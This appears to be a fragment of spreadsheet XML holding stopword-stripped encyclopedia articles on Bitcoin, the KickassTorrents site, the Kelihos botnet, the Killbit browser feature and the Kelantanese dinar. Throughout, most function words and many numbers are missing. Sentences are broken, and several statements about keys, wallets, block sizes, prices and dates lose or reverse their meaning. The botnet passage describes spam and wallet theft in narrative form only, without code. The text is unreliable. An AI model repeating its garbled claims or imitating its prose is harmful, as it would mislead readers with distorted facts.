    <t xml:space="preserve">bitcoin decentralized digital currency transferred peer-to-peer bitcoin network. bitcoin transactions verified network nodes cryptography recorded public distributed ledger called blockchain. cryptocurrency invented 2008 unknown person group people using name satoshi nakamoto. currency began 2009, implementation released open-source software.: bitcoin described economic bubble least eight nobel memorial prize economic sciences recipients.the word bitcoin defined white paper published october 2008. compound words coin. uniform convention bitcoin capitalization exists; sources bitcoin, capitalized, refer technology network bitcoin, lowercase, unit account. wall street journal, chronicle higher education, oxford english dictionary advocate lowercase bitcoin cases. local national governments officially using bitcoin capacity; salvador central african republic adopted bitcoin legal tender, ukraine accepting bitcoin donations fund resistance russian invasion. design units divisibility unit account bitcoin system bitcoin. currency codes representing bitcoin xbt.: unicode character bitcoin divisible eight decimal places.: units smaller amounts bitcoin millibitcoin (mbtc), equal 1⁄1000 bitcoin, satoshi (sat), smallest possible division, named homage bitcoin's creator, representing 1⁄100000000 (one hundred millionth) bitcoin. 100,000 satoshis mbtc. blockchain bitcoin blockchain public ledger records bitcoin transactions. implemented chain blocks, block containing cryptographic hash previous block genesis block chain. network communicating nodes running bitcoin software maintains blockchain.: 215–219 transactions form payer sends bitcoins payee broadcast network using readily available software applications. network nodes validate transactions, copy ledger, broadcast ledger additions nodes. achieve independent verification chain ownership network node stores copy blockchain. varying intervals time averaging every minutes, group accepted transactions, called block, created, added blockchain, quickly published nodes, without requiring central oversight. this allows bitcoin software determine particular bitcoin spent, needed prevent double-spending. conventional ledger records transfers actual bills promissory notes exist apart blockchain place bitcoins said exist form unspent outputs transactions.: individual blocks, public addresses transactions within blocks examined using blockchain explorer. transactions transactions defined using forth-like scripting language.: transactions consist inputs outputs. when user sends bitcoins, user designates address amount bitcoin sent address output. prevent double spending, input must refer previous unspent output blockchain. multiple inputs corresponds multiple coins cash transaction. since transactions multiple outputs, users send bitcoins multiple recipients transaction. cash transaction, inputs (coins used pay) exceed intended payments. case, additional output used, returning change back payer. input satoshis accounted transaction outputs become transaction fee.though transaction fees optional, miners choose transactions process prioritize higher fees. miners choose transactions based paid relative storage size, absolute amount money paid fee. these fees generally measured satoshis byte (sat/b). size transactions dependent number inputs used create transaction, number outputs.: blocks blockchain originally limited megabytes size. block size limit megabyte introduced satoshi nakamoto 2010. eventually block size limit megabyte created problems transaction processing, increasing transaction fees delayed processing transactions. andreas antonopoulos stated lightning network potential scaling solution referred lightning second-layer routing network.: ownership blockchain, bitcoins registered bitcoin addresses. creating bitcoin address requires nothing picking random valid private computing corresponding bitcoin address. this computation done split second. reverse, computing private given bitcoin address, practically unfeasible.: users tell others make public bitcoin address without compromising corresponding private key. moreover, number valid private keys vast extremely unlikely someone compute key-pair already funds. vast number valid private keys makes unfeasible brute force could used compromise private key. able spend bitcoins, owner must know corresponding private digitally sign transaction. network verifies signature using public key; private never revealed.: private lost, bitcoin network recognize evidence ownership; coins unusable, effectively lost. example, 2013 user claimed lost 7,500 bitcoins, worth $7.5 million time, accidentally discarded hard drive containing private key. about bitcoins believed lost -they would market value billion july 2018 prices.to ensure security bitcoins, private must kept secret.: private revealed third party, e.g. data breach, third party steal associated bitcoins. december 2017, around 980,000 bitcoins stolen cryptocurrency exchanges.regarding ownership distribution, march 2018, 0.5% bitcoin wallets bitcoins ever mined. mining mining record-keeping service done computer processing power. miners keep blockchain consistent, complete, unalterable repeatedly grouping newly broadcast transactions block, broadcast network verified recipient nodes. each block contains sha-256 cryptographic hash previous block, thus linking previous block giving blockchain name.: accepted rest network, block must contain proof-of-work (pow). requires miners find number called nonce (number used once), block content hashed along nonce, result numerically smaller network's difficulty target.: this proof easy node network verify, extremely time-consuming generate, secure cryptographic hash, miners must many different nonce values (usually sequence tested values ascending natural numbers: ...) result happens less difficulty target. because difficulty target extremely small compared typical sha-256 hash, block hashes many leading zeros: seen example block hash: 0000000000000000000590fc0f3eba193a278534220b2b37e9849e1a770ca959by adjusting difficulty target, amount work needed generate block changed. every 2,016 blocks (approximately days given roughly minutes block), nodes deterministically adjust difficulty target based recent rate block generation, keeping average time blocks minutes. system automatically adapts total amount mining power network.: april 2022, takes average sextillion (122 thousand billion billion) attempts generate block hash smaller difficulty target. computations magnitude extremely expensive utilize specialized hardware.the proof-of-work system, alongside chaining blocks, makes modifications blockchain extremely hard, attacker must modify subsequent blocks order modifications block accepted. blocks mined time, difficulty modifying block increases time passes number subsequent blocks (also called confirmations given block) increases.computing power often bundled together mining pool reduce variance miner income. individual mining rigs often wait long periods confirm block transactions receive payment. pool, participating miners paid every time participating server solves block. this payment depends amount work individual miner contributed help find block. supply successful miner finding block allowed rest network collect transaction fees transactions included block, well predetermined reward newly created bitcoins. 2020, reward currently 6.25 newly created bitcoins block. claim reward, special transaction called coinbase included block, miner payee.: bitcoins existence created type transaction. bitcoin protocol specifies reward adding block reduced half every 210,000 blocks (approximately every four years). eventually, reward round zero, limit million bitcoins reached 2140; record keeping rewarded transaction fees only. decentralization bitcoin decentralized thus: bitcoin central authority. bitcoin network peer-to-peer, without central servers. network also central storage; bitcoin ledger distributed. ledger public; anybody store computer.: there single administrator; ledger maintained network equally privileged miners.: anyone become miner.: additions ledger maintained competition. until block added ledger, known miner create block.: issuance bitcoins decentralized. they issued reward creation block. anybody create bitcoin address bitcoin counterpart bank account) without needing approval.: anybody send transaction network without needing approval; network merely confirms transaction legitimate.: conversely, researchers pointed "trend towards centralization". although bitcoin sent directly user user, practice intermediaries widely used.: 220–222 bitcoin miners join large mining pools minimize variance income.: 215, 219–222 because transactions network confirmed miners, decentralization network requires single miner mining pool obtains hashing power, would allow double-spend coins, prevent certain transactions verified prevent miners earning income. 2013 mining pools controlled overall bitcoin hashing power. 2014 mining pool ghash.io obtained hashing power raised significant controversies safety network. pool voluntarily capped hashing power 39.99% requested pools responsibly benefit whole network. around year 2017, hashing power transactions operating china.according researchers, parts ecosystem also "controlled small entities", notably maintenance client software, online wallets simplified payment verification (spv) clients. privacy fungibility bitcoin pseudonymous, meaning funds tied real-world entities rather bitcoin addresses. owners bitcoin addresses explicitly identified, transactions blockchain public. addition, transactions linked individuals companies "idioms use" (e.g., transactions spend coins multiple inputs indicate inputs common owner) corroborating public transaction data known information owners certain addresses. additionally, bitcoin exchanges, bitcoins traded traditional currencies, required collect personal information. heighten financial privacy, bitcoin address generated transaction.wallets similar software technically handle bitcoins equivalent, establishing basic level fungibility. researchers pointed history bitcoin registered publicly available blockchain ledger, users refuse accept bitcoins coming controversial transactions, would harm bitcoin's fungibility. example, 2012, froze accounts users deposited bitcoins known stolen. wallets wallet stores information necessary transact bitcoins. while wallets often described place hold store bitcoins, nature system, bitcoins inseparable blockchain transaction ledger. wallet correctly defined something "stores digital credentials bitcoin holdings" allows access (and spend) them.: glossary bitcoin uses public-key cryptography, cryptographic keys, public private, generated. basic, wallet collection keys. software wallets first wallet program, simply named bitcoin, sometimes referred satoshi client, released 2009 satoshi nakamoto open-source software. version client moved wxwidgets user interface toolkit whole bundle referred bitcoin-qt. after release version 0.9, software bundle renamed bitcoin core distinguish underlying network. bitcoin core perhaps, best known implementation client. alternative clients (forks bitcoin core) exist, bitcoin bitcoin unlimited, parity bitcoin.there several modes wallets operate they inverse relationship regards trustlessness computational requirements. full clients verify transactions directly downloading full copy blockchain (over january 2018). they secure reliable using network, trust external parties required. full clients check validity mined blocks, preventing transacting chain breaks alters network rules.: because size complexity, downloading verifying entire blockchain suitable computing devices. lightweight clients consult full nodes send receive transactions without requiring local copy entire blockchain (see simplified payment verification spv). this makes lightweight clients much faster allows used low-power, low-bandwidth devices smartphones. when using lightweight wallet, however, user must trust full nodes, report faulty values back user. lightweight clients follow longest blockchain ensure valid, requiring trust full nodes.third-party internet services called online wallets webwallets offer similar functionality easier use. case, credentials access funds stored online wallet provider rather user's hardware. result, user must complete trust online wallet provider. malicious provider breach server security cause entrusted bitcoins stolen. example security breach occurred 2011. cold storage wallet software targeted hackers lucrative potential stealing bitcoins. technique called "cold storage" keeps private keys reach hackers; accomplished keeping private keys offline times: generating device connected internet.: credentials necessary spend bitcoins stored offline number different ways, specialized hardware wallets simple paper printouts private key.: hardware wallets hardware wallet computer peripheral signs transactions requested user. these devices store private keys carry signing encryption internally, share sensitive information host computer except already signed (and thus unalterable) transactions. because hardware wallets never expose private keys, even computers compromised malware vector access steal them.: 42–45 user sets passcode setting hardware wallet. hardware wallets tamper-resistant,: passcode needed extract money. paper wallets paper wallet created keypair generated computer internet connection; private written printed onto paper erased computer.: paper wallet stored safe physical location later retrieval.: physical wallets also take form metal token coins private accessible security hologram recess struck reverse side.: security hologram self-destructs removed token, showing private accessed. originally, tokens struck brass base metals, later used precious metals bitcoin grew value popularity.: coins stored face value high ₿1000 struck gold.: 102–104 british museum's coin collection includes four specimens earliest series: funded bitcoin tokens; currently display museum's money gallery. 2013, utah manufacturer tokens ordered financial crimes enforcement network (fincen) register money services business producing funded bitcoin tokens.: history creation domain name bitcoin.org registered august 2008. october 2008, link paper authored satoshi nakamoto titled bitcoin: peer-to-peer electronic cash system posted cryptography mailing list. nakamoto implemented bitcoin software open-source code released january 2009. nakamoto's identity remains unknown.on january 2009, bitcoin network created nakamoto mined starting block chain, known genesis block. embedded coinbase block text "the times 03/jan/2009 chancellor brink second bailout banks". this note references headline published times interpreted timestamp comment instability caused fractional-reserve banking.: receiver first bitcoin transaction finney, created first reusable proof-of-work system (rpow) 2004. finney downloaded bitcoin software release date, january 2009 received bitcoins nakamoto. other early cypherpunk supporters creators bitcoin predecessors: dai, creator b-money, nick szabo, creator gold. 2010, first known commercial transaction using bitcoin occurred programmer laszlo hanyecz bought papa john's pizzas ₿10,000 jeremy sturdivant.blockchain analysts estimate nakamoto mined million bitcoins disappearing 2010 handed network alert control code repository gavin andresen. andresen later became lead developer bitcoin foundation. andresen sought decentralize control. this left opportunity controversy develop future development path bitcoin, contrast perceived authority nakamoto's contributions. 2011–2012 after early "proof-of-concept" transactions, first major users bitcoin black markets, silk road. during months existence, beginning february 2011, silk road exclusively accepted bitcoins payment, transacting million bitcoins, worth $214 million.: 2011, price started $0.30 bitcoin, growing $5.27 year. price rose $31.50 june. within month, price fell $11.00. next month fell $7.80, another month $4.77.in 2012, bitcoin prices started $5.27, growing $13.30 year. january price risen $7.38, crashed $3.80 next days. price rose $16.41 august, fell $7.10 next three days.the bitcoin foundation founded september 2012 promote bitcoin's development uptake.on november 2011, reference implementation bitcoin-qt version 0.5.0 released. introduced front used user interface toolkit. software previously used berkeley database management. developers switched leveldb release order reduce blockchain synchronization time. update release resulted minor blockchain fork march 2013. fork resolved shortly afterwards. seeding nodes discontinued version 0.8.2. from version 0.9.0 software renamed bitcoin core. transaction fees reduced factor means encourage microtransactions. although bitcoin core openssl operation network, software openssl remote procedure calls. version 0.9.1 released remove network's vulnerability heartbleed bug. 2013–2016 2013, prices started $13.30 rising $770 january 2014.in march 2013 blockchain temporarily split independent chains different rules version bitcoin software. blockchains operated simultaneously hours, version transaction history moment split. normal operation restored majority network downgraded version bitcoin software, selecting backwards-compatible version blockchain. result, blockchain became longest chain could accepted participants, regardless bitcoin software version. during split, exchange briefly halted bitcoin deposits price dropped recovering previous level approximately following hours.the financial crimes enforcement network (fincen) established regulatory guidelines "decentralized virtual currencies" bitcoin, classifying american bitcoin miners sell generated bitcoins money service businesses (msbs), subject registration legal obligations.in april, exchanges bitinstant experienced processing delays insufficient capacity resulting bitcoin price dropping $266 returning $160 within hours. bitcoin price rose $259 april, crashed next three days.on 2013, authorities seized accounts associated discovering registered money transmitter fincen june 2013, drug enforcement administration listed ₿11.02 seized asset united states department justice seizure notice pursuant u.s.c. 881. this marked first time government agency seized bitcoin. seized ₿30,000 october 2013 dark website silk road, following arrest ross william ulbricht. these bitcoins sold blind auction united states marshals service venture capital investor draper. bitcoin's price rose $755 november crashed $378 day. november 2013, price reached $1,163 starting long-term crash, declining $152 january 2015.on december 2013, people's bank china prohibited chinese financial institutions using bitcoins. after announcement, value bitcoins dropped, baidu longer accepted bitcoins certain services. buying real-world goods virtual currency illegal china since least 2009.in 2014, prices started $770 fell $314 year. july 2014, wikimedia foundation started accepting donations bitcoin.in 2015, prices started $314 rose $434 year. 2016, prices rose climbed $998 january 2017.release 0.10 software made public february 2015. introduced consensus library gave programmers easy access rules governing consensus network. version 0.11.2 developers added feature allowed transactions made unspendable specific time future. bitcoin core 0.12.1 released april 2016, enabled multiple soft forks occur concurrently. around contributors worked bitcoin core 0.13.0 released august 2016. july 2016, checksequenceverify soft fork activated. august 2016, bitfinex cryptocurrency exchange platform hacked second-largest breach bitcoin exchange platform time, 119,756 bitcoin, worth million time, stolen.in october 2016, bitcoin core's 0.13.1 release featured "segwit" soft fork included scaling improvement aiming optimize bitcoin blocksize. patch originally finalized april, developers engaged deploy this release featured segregated witness (segwit) aimed place downward pressure transaction fees well increase maximum transaction capacity network. 0.13.1 release endured extensive testing research leading delays release date. segwit prevents various forms transaction malleability. 2017–2019 research produced university cambridge estimated 2017, million unique users using cryptocurrency wallet, using bitcoin. july 2017, controversial segregated witness [segwit] software upgrade approved ("locked-in"). segwit intended support lightning network well improve scalability. segwit subsequently activated network august 2017. bitcoin price rose almost week following segwit's approval. july 2017, bitcoin trading $2,748, july 2017's $1,835. supporters large blocks dissatisfied activation segwit forked software august 2017 create bitcoin cash, becoming many forks bitcoin bitcoin gold.prices started $998 2017 rose $13,412.44 january 2018, reaching all-time high $19,783.06 december 2017.china banned trading bitcoin, first steps taken september 2017, complete started february 2018. bitcoin prices fell $9,052 $6,914 february 2018. percentage bitcoin trading chinese renminbi fell september 2017 less june 2018.throughout rest first half 2018, bitcoin's price fluctuated $11,480 $5,848. july 2018, bitcoin's price $6,343. price january 2019 $3,747, 2018 since all-time high.in september 2018, anonymous party discovered reported invalid-block denial-of-server vulnerability developers bitcoin core, bitcoin bitcoin unlimited. further analysis bitcoin developers showed issue could also allow creation blocks violating million coin limit cve-2018-17144 assigned issue resolved.bitcoin prices negatively affected several hacks thefts cryptocurrency exchanges, including thefts coincheck january 2018, bithumb june, bancor july. first months 2018, $761 million worth cryptocurrencies reported stolen exchanges. bitcoin's price affected even though cryptocurrencies stolen coinrail bancor investors worried security cryptocurrency exchanges. september 2019 intercontinental exchange (the owner nyse) began trading bitcoin futures exchange called bakkt. bakkt also announced would launch options bitcoin december 2019. december 2019, youtube removed bitcoin cryptocurrency videos, later restored content judging "made wrong call".in february 2019, canadian cryptocurrency exchange quadriga fintech solutions failed approximately $200 million missing. june 2019 price recovered $13,000. 2020–present march 2020, bitcoin fell $4,000 broad market selloff, trading $10,000 february 2020. march 2020, 281,000 bitcoins sold, held owners thirty days. this compared ₿4,131 laid dormant year more, indicating vast majority bitcoin volatility recent buyers. during week march 2020, cryptocurrency exchange kraken experienced increase number account signups week bitcoin's price collapse, result buyers looking capitalize price. these events attributed onset covid-19 pandemic. august 2020, microstrategy invested $250 million bitcoin treasury reserve asset. october 2020, square, inc. placed approximately total assets ($50 million) bitcoin. november 2020, paypal announced users could buy, hold, sell bitcoin. november 2020, bitcoin value reached all-time high $19,860, topping previous high december 2017. alexander vinnik, founder btc-e, convicted sentenced five years prison money laundering france refusing testify trial. december 2020, massachusetts mutual life insurance company announced bitcoin purchase us$100 million, roughly 0.04% general investment account.on january 2021, elon musk placed handle #bitcoin twitter profile, tweeting retrospect, inevitable", caused price briefly rise $5000 hour $37,299. january 2021, microstrategy announced continued bitcoin date holdings ₿70,784 worth $2.38 billion. february 2021 tesla's announcement bitcoin purchase us$1.5 billion plan start accepting bitcoin payment vehicles, pushed bitcoin price $44,141. february 2021, elon musk stated "owning bitcoin little better holding conventional cash, slight difference made better asset hold". after days accepting digital currency, tesla reversed course 2021, saying would longer take bitcoin concerns "mining" cryptocurrency contributing consumption fossil fuels climate change. decision resulted price bitcoin dropping around may. during july bitcoin conference, musk suggested tesla could possibly help bitcoin miners switch renewable energy future also stated conference bitcoin mining reaches, trends percent renewable energy usage, "tesla would resume accepting bitcoin." price bitcoin rose announcement.in june 2021, legislative assembly salvador voted legislation make bitcoin legal tender salvador. took effect september. implementation protests calls make currency optional, compulsory. according survey central american university, majority salvadorans disagreed using cryptocurrency legal tender, survey center citizen studies (cec) showed country prefers dollar bitcoin. october 2021, country's government exploring mining bitcoin geothermal power issuing bonds tied bitcoin. according survey done central american university days bitcoin came force: 34.8% population confidence bitcoin, 35.3% little confidence, 13.2% confidence, 14.1% confidence. 56.6% respondents downloaded government bitcoin wallet; among 62.9% never used whereas 36.3% uses bitcoin least month. 2022, international monetary fund (imf) urged salvador reverse decision bitcoin lost half value months. also warned would difficult loan institution.also june, taproot network software upgrade approved, adding support schnorr signatures, improved functionality smart contracts lightning network. upgrade installed november.on october 2021, approved proshares bitcoin strategy etf, cash-settled futures exchange-traded fund (etf). first bitcoin united states gained first trading october 2021.on march 2022, pavel zavalny stated russia might accept bitcoin payment exports, response sanctions stemming 2022 russian invasion ukraine. april 2022 central african republic adopted bitcoin legal tender alongside franc. 2022, bitcoin price fell $31,324, result collapse stablecoin experiment named terra, bitcoin since november 2021 high. june 2022, celsius network decentralized finance loan company) halted withdrawals resulted bitcoin price falling $20,000. associated ideologies satoshi nakamoto stated essay accompanying bitcoin's code that: "the root problem conventional currencies trust that's required make work. central bank must trusted debase currency, history fiat currencies full breaches trust." austrian economics roots according european central bank, decentralization money offered bitcoin theoretical roots austrian school economics, especially friedrich hayek book denationalisation money: argument refined, hayek advocates complete free market production, distribution management money monopoly central banks.: anarchism libertarianism according york times, libertarians anarchists attracted philosophical idea behind bitcoin. early bitcoin supporter roger said: first, almost everyone involved philosophical reasons. bitcoin great idea, separate money state." economist describes bitcoin techno-anarchist project create online version cash, people transact without possibility interference malicious governments banks". economist paul krugman argues cryptocurrencies like bitcoin "something cult" based "paranoid fantasies" government power. nigel dodd argues social life bitcoin essence bitcoin ideology remove money social, well governmental, control. dodd quotes youtube video, roger ver, jeff berwick, charlie shrem, andreas antonopoulos, gavin wood, trace meyer proponents bitcoin reading declaration bitcoin's independence. declaration includes message crypto-anarchism words: "bitcoin inherently anti-establishment, anti-system, anti-state. bitcoin undermines governments disrupts institutions bitcoin fundamentally humanitarian."david golumbia says ideas influencing bitcoin advocates emerge right-wing extremist movements liberty lobby john birch society anti-central bank rhetoric, recently, paul party-style libertarianism. steve bannon, owns "good stake" bitcoin, considers "disruptive populism. takes control back central authorities. it's revolutionary."a 2014 study google trends data found correlations bitcoin-related searches ones related computer programming illegal activity, libertarianism investment topics. economics bitcoin digital asset designed work peer-to-peer transactions currency. bitcoins three qualities useful currency, according economist january 2015: "hard earn, limited supply easy verify". researchers, 2015, bitcoin functions payment system currency.economists define money serving following three purposes: store value, medium exchange, unit account. according economist 2014, bitcoin functions best medium exchange. however, debated, 2018 assessment economist stated cryptocurrencies none three criteria. yale economist robert shiller writes bitcoin potential unit account measuring relative value goods, chile's unidad fomento, "bitcoin present form really solve sensible economic problem".according research cambridge university, million million unique users used cryptocurrency wallet 2017, bitcoin. number users grown significantly since 2013, 300,000–1.3 million users. acceptance merchants dish network, fortune subscription provider, described first large company accept bitcoin, 2014.bloomberg reported largest crypto merchant-processing services handled million june 2018, $411 million september 2017. bitcoin "not actually usable" retail transactions high costs inability process chargebacks, according nicholas weaver, researcher quoted bloomberg. high price volatility transaction fees make paying small retail purchases bitcoin impractical, according economist grauer. however, bitcoin continues used large-item purchases sites overstock.com, cross-border payments freelancers vendors.in 2017 2018, bitcoin's acceptance among major online retailers included three u.s. online merchants, five 2016. reasons decline include high transaction fees bitcoin's scalability issues long transaction times.as 2018, overwhelming majority bitcoin transactions took place cryptocurrency exchanges, rather used transactions merchants. delays processing payments blockchain minutes make bitcoin difficult retail setting. prices usually quoted units bitcoin many trades involve one, sometimes two, conversions conventional currencies. merchants accept bitcoin payments payment service providers perform conversions. financial institutions bitcoins bought digital currency exchanges. researchers, "there little sign bitcoin use" international remittances despite high fees charged banks western union compete market. south china morning post, however, mentions bitcoin hong kong workers transfer money home.in 2014, national australia bank closed accounts businesses ties bitcoin, hsbc refused serve hedge fund links bitcoin. australian banks general reported closing bank accounts operators businesses involving currency.on december 2017, chicago board options exchange started trading bitcoin futures, followed chicago mercantile exchange, started trading bitcoin futures december 2017.in september 2019 central bank venezuela, request pdvsa, tests determine bitcoin ether could held central bank's reserves. request motivated company's goal suppliers.françois velde, senior economist chicago fed, described bitcoin elegant solution problem creating digital currency". david andolfatto, vice president federal reserve bank louis, stated bitcoin threat establishment, argues good thing federal reserve system central banks, prompts institutions operate sound policies.: investment winklevoss twins purchased bitcoin. 2013, washington post reported claim owned bitcoins existence time.other methods investment bitcoin funds. first regulated bitcoin fund established jersey july 2014 approved jersey financial services commission.forbes named bitcoin best investment 2013. 2014, bloomberg named bitcoin worst investments year. 2015, bitcoin topped bloomberg's currency tables.according bitinfocharts.com, 2017, 9,272 bitcoin wallets million worth bitcoins. exact number bitcoin millionaires uncertain single person bitcoin wallet. venture capital peter thiel's founders fund invested us$3 million bitpay. 2012, incubator bitcoin-focused start-ups founded adam draper, financing help father, venture capitalist draper, largest bitcoin holders winning auction 30,000 bitcoins, time called "mystery buyer". company's goal fund bitcoin businesses within years $10,000 $20,000 stake. investors also invest bitcoin mining. according 2015 study paolo tasca, bitcoin startups raised almost billion three years </t>
  </si>
  <si>
    <t>KickassTorrents</t>
  </si>
  <si>
    <t>kickasstorrents (commonly abbreviated kat) website provided directory torrent files magnet links facilitate peer-to-peer file sharing using bittorrent protocol. founded 2008 november 2014, became visited bittorrent directory world, overtaking pirate bay, according site's alexa ranking. went offline july 2016 domain seized u.s. government. site's proxy servers shut staff time.in december 2016, former staff members revived community creating website predecessor's features appearance. history initially launched november 2008 domain name kickasstorrents.com. april 2011, moved philippine domain kat.ph series domain name seizures department justice demonoid torrentz. site later moved across several different domains, operators planned every months, including ka.tt, kickass.to, kickass.so, kickasstorrents.im kat.cr.in june 2016, added official network .onion address. blocking censorship kickasstorrents website claimed complied dmca removed infringing torrents reported content owners.on february 2013, internet service providers (isps) united kingdom ordered high court london block access kickasstorrents, along torrent sites. judge richard arnold ruled site's design contributed copyright infringement. june, domain name changed tonga domain name kickass.to part site's regular domain change.later june, delisted google request mpaa. late august 2013, blocked belgian isps. january 2014, several irish isps started blocking kat, february, twitter started blocking links kat, although stopped days. june 2014, blocked malaysia communications multimedia commission violating copyright law.in december 2014, site moved somalia domain name kickass.so, reportedly result site's regular domain change. february 2015, kickass.so listed "banned" whois, causing site offline. later day, site reverted former domain name kickass.to. february 2015, found messages mentioning "kickass.to" blocked steam chat, "kickass.so" popular torrent websites blocked, flagged "potentially malicious".on april 2015, site moved isle man-based domain kickasstorrents.im quickly taken later april moved costa rica based domain name kat.cr. july 2015, kat.cr address removed google search's results. after removal, google search result many locations pointed fake site prompted visitors download malware.in october 2015, portugal bypassed courts making voluntary agreement isps, rightsholders ministry culture block access popular bittorrent websites. time, google chrome mozilla firefox blocked access security concerns pointing malware. april 2016, google chrome mozilla firefox blocked phishing concerns. both blocks later removed dealt concerns. main domains site went sale august 2016. arrest alleged owner july 2016, united states department justice announced seized kat.cr domain identified alleged owner. artem vaulin (ukrainian: артем ваулін), 30-year-old ukrainian known online "tirm", detained poland charged four-count u.s. criminal indictment. remaining domains taken offline voluntarily kat.cr domain name seized. following seizure original domain multiple unofficial mirrors online. these connection original team urging users exercise caution. number mirrors since taken down.vaulin arrested investigators cross-referenced address used itunes transaction address used kat's facebook page. also posed advertiser obtained details bank account associated site. investigation special agent jared der-yeghiayan, also tracked ross ulbricht, operator online black market silk road.the criminal complaint, filed united states district court northern district illinois homeland security investigations, said possession full copies kat's hard drives, including email server. investigation suggested made million year advertising revenue.in late august 2016, department justice followed complaint full grand jury indictment vaulin defendants, ievgen kutsenko oleksandr radostin; vaulin still held polish prison. vaulin polish legal representation rothken lawyers handle allegations. november 2016, polish appeals court refused allow bail vaulin, stating evidence provided sufficient keep prison.the case artem vaulin prosecution officially hold vaulin "disappeared" poland. bail $108,000 forfeited. legal team reported withdrawn case lost contact vaulin. revival mid-december 2016, former staff moderators launched website similar appearance original domain katcr.co. site offline since july 2020. references</t>
  </si>
  <si>
    <t>Kelihos botnet</t>
  </si>
  <si>
    <t>kelihos botnet, also known hlux, botnet mainly involved spamming theft bitcoins. history kelihos botnet first discovered around december 2010. researchers originally suspected found version either storm waledac botnet, similarities modus operandi source code bot, analysis botnet showed instead new, 45,000-infected-computer-strong, botnet capable sending estimated billion spam messages day. september 2011 microsoft took botnet operation codenamed "operation b79". time, microsoft filed civil charges dominique alexander piatti, dotfree group john defendants suspected involvement botnet issuing 3,700 subdomains used botnet. these charges later dropped microsoft determined named defendants intentionally botnet controllers.in january 2012 version botnet discovered, sometimes referred kelihos.b version consisting estimated 110,000 infected computers. during month microsoft pressed charges russian citizen andrey sabelnikov, former security professional, alleged creator kelihos botnet sourcecode. second version botnet shut march 2012 several privately owned firms sinkholing technique gave companies control botnet cutting original controllers.following shutdown second version botnet, version surfaced early april, though disagreement research groups whether botnet simply remnants disabled version botnet, version altogether. this version botnet currently consists estimated 70,000 infected computers. kelihos.c version mostly infects computers facebook sending users website malicious download links. once clicked, trojan horse named fifesoc downloaded, turns computer zombie, part botnet.on november 2015 kelihos botnet event occurred causing widespread false positives blacklisted ips: ″november 2015 widespread false positives earlier today, large scale kelihos botnet event occurred large scale, many email installations seeing excess kelihos spam, inbound email volume jump volume much 500%. this unusual thing normally, cbl/xbl successfully dealing large scale kelihos spam spikes like this, often daily, years. email allegedly federal reserve, saying something restrictions "u.s. federal wire online payments." notice fraudulent, attached excel spreadsheet (.xls) contained macro instructions downloader) download windows executable virus, likely dyreza dridex malware. detection rules initially deployed unfortunately insufficiently detailed, listed number addresses error.″ affidavit unsealed february 2018, showed apple's unexpected role bringing russian spam king justice. peter levashov allegedly kelihos botnet alias "severa", renting access spammers cybercriminals. despite levashov's significant efforts anonymity, court records show federal agents surveilling icloud account since 2016, funneling back crucial information arrest. standing federal icloud warrant would given authorities running addresses used account, could easily tipped vacation barcelona, spain, arrested request enforcement extradited united states prosecution. structure, operations spread kelihos botnet so-called peer-to-peer botnet, individual botnet nodes capable acting command-and-control servers entire botnet. traditional non-peer-to-peer botnets, nodes receive instructions "work" limited servers servers removed taken down, botnet longer receive instructions therefore effectively shut down. peer-to-peer botnets seek mitigate risk allowing every peer send instructions entire botnet, thus making difficult shut down.the first version botnet mainly involved denial-of-service attacks email spam, version botnet added ability steal bitcoin wallets, well program used mine bitcoins itself. spam capacity allows botnet spread sending malware links users order infect trojan horse, though later versions mostly propagate social network sites, particular facebook. comprehensive list kelihos spam found following research paper. arrest extradition february 2018, united states department justice announced russian national extradited spain arraigned connecticut charges stemming alleged operation kelihos botnet. peter yuryevich levashov, also known pyotr levashov, petr levashov, peter severa, petr severa sergey astakhov, petersburg, detained april 2017 barcelona, arrested spanish authorities based upon criminal complaint arrest warrant issued united states district connecticut. february 2018, pleaded guilty charges wire email fraud, hacking, identity theft conspiracy appearing federal judge u.s. state connecticut. remains detention. september 2018, levashov pleaded guilty. also botnet e-mail spam internet crime internet security malware references</t>
  </si>
  <si>
    <t>Killbit</t>
  </si>
  <si>
    <t>killbit security feature browsers based microsoft's trident engine (such internet explorer) activex containers respect killbit (such microsoft office). killbit instructs activex control container never specific piece activex software, whether third-party microsoft, identified class identifier (clsid). main purpose killbit close security holes. vendor discovers security hole specific version activex control, request microsoft "killbit" killbit updates typically deployed microsoft windows operating systems windows update. implementation flag windows registry identifies clsid unsafe. clsid type guid) acts serial number software question. must exist piece software behaves activex control. activex container finds clsid killbit entry matches clsid software, software blocked running activex container. vendor wants release updated version release different clsid. internet explorer's html application host also respects killbit processing object html, processing scripts html. external links microsoft kb240797: stop activex control running internet explorer (august 2007) microsoft technet: kill-bit</t>
  </si>
  <si>
    <t>Kelantanese dinar</t>
  </si>
  <si>
    <t>kelantanese dinar currency issued government malaysian state kelantan, purportedly conformance concept islamic gold dinar. kelantanese dinar available form coins several denominations. these coins first struck 2006 mariwasa kraftangan kuala kangsar, perak, local producer souvenirs replicas objects culture, launched state kelantan september 2006. government kelantan suggested coins status legal tender, state-issued dinar sold quickly, many buyers seeing gold dinar better choice fiat money.however, federal malaysian government kuala lumpur denied kelantanese dinar legal-tender status, stating buyers misled kelantanese government. currency legal tender kelantan malaysian ringgit. according malaysian constitution, ninth schedule, list 7.a, states malaysia right issue coins. fact, federal government already declared publicly 2006, response plan announced kelantanese government coins minted, state governments could issue currency. kelantan's 2010 gold silver coin issue world islamic mint dhabi, united arab emirates given authority government kelantan strike series' coins. denominations struck follows: silver dirham, dirhams. gold dinar, dinars.the obverses depict monogram arabic within decorative border. reverses pieces depicts full kelantanese coat-of-arms. these coins sold kelantan august 2010, malaysian ringgit remains legal tender. august 2011 kelantanese government collected distributed zakat people kelantanese dinars dirhams public ceremony officiated chief minister dato aziz mat. also kijang emas islamic gold dinar references</t>
  </si>
  <si>
    <t>KeepSolid</t>
  </si>
  <si>
